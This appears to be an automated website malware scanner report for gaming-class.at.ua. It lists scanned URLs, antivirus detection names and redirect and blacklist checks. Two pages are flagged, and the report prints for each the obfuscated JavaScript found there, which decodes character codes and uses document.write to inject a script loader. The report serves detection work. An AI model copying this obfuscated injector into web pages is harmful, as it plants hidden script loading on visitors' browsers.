New scan:

Malware Scanner report for gaming-class.at.ua

Malicious/Suspicious/Total urls checked
2/0/15
2 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://gaming-class.at.ua/dir/0-0-0-0-1
200 OK
Content-Length: 66177
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var temp="",i,c=0,out=""; var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106!97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!47!106!115!47!99!111!110!116!101!110!116!46!106!115!34!62!60!47!115!99!114!105!112!116!62!10!60!108!105!110!107!32!114!101!108!61!34!115!116!121!108!101!115!104!101!101!116!34!32!116!121!112!101!61!34!116!101!120!116!47!99!115!115!34!32!104!114!101!102!61!34!47!106!115!47!115!108!105!100!101!114!46!99!115!115!34!62!32!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++; out=out+String.fromCharCode(temp);temp="";}document.write(out);

Antivirus reports:

AntiVir
JS/Decdec.psc
Avast
JS:Redirector-KP [Trj]
Ikarus
Exploit.HTML.IframeRef
nProtect
Trojan.JS.QLT
K7AntiVirus
Riskware
TrendMicro-HouseCall
TROJ_GEN.F47V0122
Emsisoft
Trojan.JS.QLT (B)
Comodo
TrojWare.JS.Redirect.crk
McAfee-GW-Edition
JS/Exploit-Blacole.hv
DrWeb
JS.IFrame.180
Kaspersky
HEUR:Trojan.Script.Iframer
Microsoft
VirTool:JS/Obfuscator.CC
MicroWorld-eScan
Trojan.JS.QLT
Fortinet
JS/Kryptik.BP!tr
PCTools
Trojan.Malscript
Jiangmin
Trojan/Script.Gen
McAfee
JS/Exploit-Blacole.hv
NANO-Antivirus
Trojan.Script.Packed.iagb
F-Secure
Trojan.JS.QLT
VIPRE
Malware.JS.Generic (JS)
F-Prot
JS/Crypted.AT.gen
eSafe
JS.Agent.ia
AVG
JS/Redir
Norman
Redir.GS
Sophos
Mal/Iframe-F
GData
Trojan.JS.QLT
Symantec
Trojan.Malscript!JS
Commtouch
JS/Crypted.AT.gen
Agnitum
JS.Cored.A
ESET-NOD32
JS/Kryptik.BP
BitDefender
Trojan.JS.QLT

http://s23.ucoz.net/src/u.js
200 OK
Content-Length: 530
Content-Type: text/javascript
clean
http://gaming-class.at.ua/js/design.js
200 OK
Content-Length: 3812
Content-Type: text/javascript
clean
http://gaming-class.at.ua/js/cookie.js
404 Not Found
Content-Length: 6869
Content-Type: text/html
clean
http://gaming-class.at.ua/
200 OK
Content-Length: 140509
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

var temp="",i,c=0,out=""; var str="60!115!99!114!105!112!116!32!116!121!112!101!61!34!116!101!120!116!47!106!97!118!97!115!99!114!105!112!116!34!32!115!114!99!61!34!47!106!115!47!99!111!110!116!101!110!116!46!106!115!34!62!60!47!115!99!114!105!112!116!62!10!60!108!105!110!107!32!114!101!108!61!34!115!116!121!108!101!115!104!101!101!116!34!32!116!121!112!101!61!34!116!101!120!116!47!99!115!115!34!32!104!114!101!102!61!34!47!106!115!47!115!108!105!100!101!114!46!99!115!115!34!62!32!";l=str.length;while(c<=str.length-1){while(str.charAt(c)!='!')temp=temp+str.charAt(c++);c++; out=out+String.fromCharCode(temp);temp="";}document.write(out);

Antivirus reports:

AntiVir
JS/Decdec.psc
Avast
JS:Redirector-KP [Trj]
Ikarus
Exploit.HTML.IframeRef
nProtect
Trojan.JS.QLT
K7AntiVirus
Riskware
TrendMicro-HouseCall
TROJ_GEN.F47V0122
Emsisoft
Trojan.JS.QLT (B)
Comodo
TrojWare.JS.Redirect.crk
McAfee-GW-Edition
JS/Exploit-Blacole.hv
DrWeb
JS.IFrame.180
Kaspersky
HEUR:Trojan.Script.Iframer
Microsoft
VirTool:JS/Obfuscator.CC
MicroWorld-eScan
Trojan.JS.QLT
Fortinet
JS/Kryptik.BP!tr
PCTools
Trojan.Malscript
Jiangmin
Trojan/Script.Gen
McAfee
JS/Exploit-Blacole.hv
NANO-Antivirus
Trojan.Script.Packed.iagb
F-Secure
Trojan.JS.QLT
VIPRE
Malware.JS.Generic (JS)
F-Prot
JS/Crypted.AT.gen
eSafe
JS.Agent.ia
AVG
JS/Redir
Norman
Redir.GS
Sophos
Mal/Iframe-F
GData
Trojan.JS.QLT
Symantec
Trojan.Malscript!JS
Commtouch
JS/Crypted.AT.gen
Agnitum
JS.Cored.A
ESET-NOD32
JS/Kryptik.BP
BitDefender
Trojan.JS.QLT

http://gaming-class.at.ua/highslide/highslide.js
200 OK
Content-Length: 88892
Content-Type: text/javascript
clean
http://stingers.net.ru//js/design.js/
500 Can't connect to stingers.net.ru:80
Content-Length: 190
Content-Type: text/plain
clean
http://stingers.net.ru/test404page.js
500 Can't connect to stingers.net.ru:80
Content-Length: 190
Content-Type: text/plain
clean
http://stingers.net.ru//js/cookie.js/
500 Can't connect to stingers.net.ru:80
Content-Length: 190
Content-Type: text/plain
clean
http://s39.ucoz.net/src/u.js
200 OK
Content-Length: 530
Content-Type: text/javascript
clean
http://stingers.net.ru//panel/padding.js/
500 Can't connect to stingers.net.ru:80
Content-Length: 190
Content-Type: text/plain
clean
http://s103.ucoz.net/src/u.js
200 OK
Content-Length: 530
Content-Type: text/javascript
clean
http://s45.ucoz.net/src/jquery-1.7.2.js
200 OK
Content-Length: 94840
Content-Type: text/javascript
clean
http://s45.ucoz.net/src/ulightbox/ulightbox.js
200 OK
Content-Length: 22097
Content-Type: text/javascript
clean
http://s45.ucoz.net/src/uwnd.js?2
200 OK
Content-Length: 228554
Content-Type: text/javascript
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: gaming-class.at.ua

Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 29 Jul 2015 05:08:44 GMT
Server: uServ/3.2.2
Content-Length: 140509
Content-Type: text/html; charset=UTF-8

...140509 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: gaming-class.at.ua
Referer: http://www.google.com/search?q=gaming-class.at.ua

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=gaming-class.at.ua

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://gaming-class.at.ua/

Result: gaming-class.at.ua is not infected or malware details are not published yet.